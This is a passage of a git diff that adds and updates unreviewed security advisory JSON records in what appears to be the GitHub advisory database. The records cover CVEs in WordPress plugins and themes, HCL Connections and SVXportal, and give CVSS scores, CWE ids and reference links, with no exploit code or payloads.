Levels.This issue affects Penci AI SmartContent Creator: from n/a through <= 2.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:26Z" diff --git a/advisories/unreviewed/2026/02/GHSA-vg7x-9fx9-rhfv/GHSA-vg7x-9fx9-rhfv.json b/advisories/unreviewed/2026/02/GHSA-vg7x-9fx9-rhfv/GHSA-vg7x-9fx9-rhfv.json new file mode 100644 index 0000000000000..dac66bfd03145 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vg7x-9fx9-rhfv/GHSA-vg7x-9fx9-rhfv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vg7x-9fx9-rhfv", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-52603" + ], + "details": "HCL Connections is vulnerable to information disclosure. In a very specific user navigation scenario, this could allow a user to obtain limited information when a single piece of internal metadata is returned in the browser.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52603" + }, + { + "type": "WEB", + "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124242" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-213" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vhgp-3x24-vh98/GHSA-vhgp-3x24-vh98.json b/advisories/unreviewed/2026/02/GHSA-vhgp-3x24-vh98/GHSA-vhgp-3x24-vh98.json new file mode 100644 index 0000000000000..ab9a1a0019539 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vhgp-3x24-vh98/GHSA-vhgp-3x24-vh98.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vhgp-3x24-vh98", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-69295" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Coven Core coven-core allows Blind SQL Injection.This issue affects Coven Core: from n/a through <= 1.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69295" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/coven-core/vulnerability/wordpress-coven-core-plugin-1-3-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json b/advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json new file mode 100644 index 0000000000000..e3a4eb2776bd6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjvc-9fxm-2xw8", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69368" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GT3themes SOHO - Photography WordPress Theme soho allows DOM-Based XSS.This issue affects SOHO - Photography WordPress Theme: from n/a through <= 3.0.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69368" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/soho/vulnerability/wordpress-soho-photography-wordpress-theme-theme-3-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json b/advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json new file mode 100644 index 0000000000000..cc0af4ab5b99c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vmwq-q997-3c46", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22362" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Photolia photolia allows PHP Local File Inclusion.This issue affects Photolia: from n/a through <= 1.0.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22362" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/photolia/vulnerability/wordpress-photolia-theme-1-0-3-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vp2m-r3pp-p859/GHSA-vp2m-r3pp-p859.json b/advisories/unreviewed/2026/02/GHSA-vp2m-r3pp-p859/GHSA-vp2m-r3pp-p859.json new file mode 100644 index 0000000000000..cc8061342f1f5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vp2m-r3pp-p859/GHSA-vp2m-r3pp-p859.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vp2m-r3pp-p859", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69404" + ], + "details": "Deserialization of Untrusted Data vulnerability in ThemeREX Extreme Store extremestore allows Object Injection.This issue affects Extreme Store: from n/a through <= 1.5.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69404" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/extremestore/vulnerability/wordpress-extreme-store-theme-1-5-7-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json b/advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json new file mode 100644 index 0000000000000..bf5b830a16403 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vph5-6p6f-8xpf", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68031" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in faraz sms افزونه پیامک حرفه ای فراز اس ام اس farazsms allows Reflected XSS.This issue affects افزونه پیامک حرفه ای فراز اس ام اس: from n/a through <= 2.7.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68031" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/farazsms/vulnerability/wordpress-fzonh-m-hrfh-fr-z-s-m-s-plugin-2-7-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vv37-5fmc-w362/GHSA-vv37-5fmc-w362.json b/advisories/unreviewed/2026/02/GHSA-vv37-5fmc-w362/GHSA-vv37-5fmc-w362.json index f6affccd03956..d2d8bcdb5820e 100644 --- a/advisories/unreviewed/2026/02/GHSA-vv37-5fmc-w362/GHSA-vv37-5fmc-w362.json +++ b/advisories/unreviewed/2026/02/GHSA-vv37-5fmc-w362/GHSA-vv37-5fmc-w362.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vv37-5fmc-w362", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25307" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 8theme XStore Core et-core-plugin allows DOM-Based XSS.This issue affects XStore Core: from n/a through < 5.7.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:14Z" diff --git a/advisories/unreviewed/2026/02/GHSA-vxf7-pjj6-wh93/GHSA-vxf7-pjj6-wh93.json b/advisories/unreviewed/2026/02/GHSA-vxf7-pjj6-wh93/GHSA-vxf7-pjj6-wh93.json new file mode 100644 index 0000000000000..e9dfb8c5d9582 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vxf7-pjj6-wh93/GHSA-vxf7-pjj6-wh93.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vxf7-pjj6-wh93", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67979" + ], + "details": "Improper Control of Generation of Code ('Code Injection') vulnerability in WesternDeal WPForms Google Sheet Connector gsheetconnector-wpforms allows Code Injection.This issue affects WPForms Google Sheet Connector: from n/a through <= 4.0.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67979" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/gsheetconnector-wpforms/vulnerability/wordpress-wpforms-google-sheet-connector-plugin-4-0-1-remote-code-execution-rce-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json b/advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json new file mode 100644 index 0000000000000..9cb37fd2b1c65 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w246-2vcp-75v8", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:40Z", + "aliases": [ + "CVE-2026-27503" + ], + "details": "SVXportal version 2.5 and prior contain a reflected cross-site scripting vulnerability in admin/log.php via the search query parameter. When an authenticated administrator views a crafted URL, the application embeds the unsanitized parameter value directly into an HTML input value attribute, allowing attacker-supplied JavaScript to execute in the administrator's browser. This can enable session theft, administrative action forgery, or other browser-based compromise in the context of an admin user.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27503" + }, + { + "type": "WEB", + "url": "https://github.com/sa2blv/SVXportal/blob/master/admin/log.php" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/svxportal-admin-log-php-search-reflected-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json b/advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json new file mode 100644 index 0000000000000..e9d68aa6beda3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w2hw-vq92-cm3x", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69380" + ], + "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in vanquish Upload Files Anywhere wp-upload-files-anywhere allows Path Traversal.This issue affects Upload Files Anywhere: from n/a through <= 2.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69380" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-upload-files-anywhere/vulnerability/wordpress-upload-files-anywhere-plugin-2-8-arbitrary-file-download-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json b/advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json new file mode 100644 index 0000000000000..a2c559792d9ce --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7wv-fvvq-ppfp", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68852" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in webmuehle Court Reservation court-reservation allows Reflected XSS.This issue affects Court Reservation: from n/a through <= 1.10.9.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68852" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/court-reservation/vulnerability/wordpress-court-reservation-manage-your-court-bookings-online-plugin-1-10-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json b/advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json new file mode 100644 index 0000000000000..b108256ae4364 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wf36-8q2p-m2xg", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-53231" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpdevstudio Easy Taxonomy Images easy-taxonomy-images allows Stored XSS.This issue affects Easy Taxonomy Images: from n/a through <= 1.0.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53231" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/easy-taxonomy-images/vulnerability/wordpress-easy-taxonomy-images-plugin-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wfqx-2rhq-j78p/GHSA-wfqx-2rhq-j78p.json b/advisories/unreviewed/2026/02/GHSA-wfqx-2rhq-j78p/GHSA-wfqx-2rhq-j78p.json new file mode 100644 index 0000000000000..9328aaa35b0ea --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wfqx-2rhq-j78p/GHSA-wfqx-2rhq-j78p.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfqx-2rhq-j78p", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68005" + ], + "details": "Missing Authorization vulnerability in themewant Easy Hotel Booking easy-hotel allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Hotel Booking: from n/a through <= 1.8.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68005" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/easy-hotel/vulnerability/wordpress-easy-hotel-booking-plugin-1-8-0-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wfqx-gw86-rc8h/GHSA-wfqx-gw86-rc8h.json b/advisories/unreviewed/2026/02/GHSA-wfqx-gw86-rc8h/GHSA-wfqx-gw86-rc8h.json new file mode 100644 index 0000000000000..7d5d118f2dbb2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wfqx-gw86-rc8h/GHSA-wfqx-gw86-rc8h.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfqx-gw86-rc8h", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68539" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Fana fana allows PHP Local File Inclusion.This issue affects Fana: from n/a through <= 1.1.35.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68539" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/fana/vulnerability/wordpress-fana-theme-1-1-35-local-file-inclusion-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wg3c-3523-f9fc/GHSA-wg3c-3523-f9fc.json b/advisories/unreviewed/2026/02/GHSA-wg3c-3523-f9fc/GHSA-wg3c-3523-f9fc.json new file mode 100644 index 0000000000000..7ebc37ca853e3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wg3c-3523-f9fc/GHSA-wg3c-3523-f9fc.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wg3c-3523-f9fc", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68855" + ], + "details": "Insertion of Sensitive Information Into Sent Data vulnerability in themeglow JobBoard Job listing job-board-light allows Retrieve Embedded Sensitive Data.This issue affects JobBoard Job listing: from n/a through <= 1.2.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68855" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/job-board-light/vulnerability/wordpress-jobboard-job-listing-plugin-1-2-8-sensitive-data-exposure-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-201" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wgg5-6gv9-fvpp/GHSA-wgg5-6gv9-fvpp.json b/advisories/unreviewed/2026/02/GHSA-wgg5-6gv9-fvpp/GHSA-wgg5-6gv9-fvpp.json new file mode 100644 index 0000000000000..28de38c396cbe --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wgg5-6gv9-fvpp/GHSA-wgg5-6gv9-fvpp.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wgg5-6gv9-fvpp", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67977" + ], + "details": "Missing Authorization vulnerability in VillaTheme HAPPY happy-helpdesk-support-ticket-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HAPPY: from n/a through <= 1.0.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67977" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/happy-helpdesk-support-ticket-system/vulnerability/wordpress-happy-plugin-1-0-8-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wh7w-625p-7j85/GHSA-wh7w-625p-7j85.json b/advisories/unreviewed/2026/02/GHSA-wh7w-625p-7j85/GHSA-wh7w-625p-7j85.json index 2cfdd410bd542..dbac3fa4b1378 100644 --- a/advisories/unreviewed/2026/02/GHSA-wh7w-625p-7j85/GHSA-wh7w-625p-7j85.json +++ b/advisories/unreviewed/2026/02/GHSA-wh7w-625p-7j85/GHSA-wh7w-625p-7j85.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wh7w-625p-7j85", - "modified": "2026-02-19T21:30:48Z", + "modified": "2026-02-20T18:31:32Z", "published": "2026-02-19T21:30:48Z", "aliases": [ "CVE-2026-27387" ], "details": "Missing Authorization vulnerability in designinvento DirectoryPress directorypress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects DirectoryPress: from n/a through <= 3.6.26.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T21:18:33Z" diff --git a/advisories/unreviewed/2026/02/GHSA-wm24-gwfw-426w/GHSA-wm24-gwfw-426w.json b/advisories/unreviewed/2026/02/GHSA-wm24-gwfw-426w/GHSA-wm24-gwfw-426w.json new file mode 100644 index 0000000000000..0c97c8eb879ed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wm24-gwfw-426w/GHSA-wm24-gwfw-426w.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wm24-gwfw-426w", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22373" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Fooddy fooddy allows PHP Local File Inclusion.This issue affects Fooddy: from n/a through <= 1.3.10.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22373" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/fooddy/vulnerability/wordpress-fooddy-theme-1-3-10-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wm24-v2x8-m9pj/GHSA-wm24-v2x8-m9pj.json b/advisories/unreviewed/2026/02/GHSA-wm24-v2x8-m9pj/GHSA-wm24-v2x8-m9pj.json new file mode 100644 index 0000000000000..ce13f60bcb10d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wm24-v2x8-m9pj/GHSA-wm24-v2x8-m9pj.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wm24-v2x8-m9pj", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69410" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Edge-Themes Belletrist belletrist allows PHP Local File Inclusion.This issue affects Belletrist: from n/a through <= 1.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69410" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/belletrist/vulnerability/wordpress-belletrist-theme-1-2-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wq4c-m266-6c9g/GHSA-wq4c-m266-6c9g.json b/advisories/unreviewed/2026/02/GHSA-wq4c-m266-6c9g/GHSA-wq4c-m266-6c9g.json index 97e1557334937..0399e4ed4c474 100644 --- a/advisories/unreviewed/2026/02/GHSA-wq4c-m266-6c9g/GHSA-wq4c-m266-6c9g.json +++ b/advisories/unreviewed/2026/02/GHSA-wq4c-m266-6c9g/GHSA-wq4c-m266-6c9g.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wq4c-m266-6c9g", - "modified": "2026-02-19T18:31:53Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:53Z", "aliases": [ "CVE-2026-25453" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in mdempfle Advanced iFrame advanced-iframe allows DOM-Based XSS.This issue affects Advanced iFrame: from n/a through <= 2025.10.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:24Z" diff --git a/advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json b/advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json new file mode 100644 index 0000000000000..6968fdd26c4e3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wqcv-67x3-mx26", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24956" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Shahjada Download Manager Addons for Elementor wpdm-elementor allows Blind SQL Injection.This issue affects Download Manager Addons for Elementor: from n/a through <= 1.3.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24956" + }, + { + "type": "WEB", + "url": 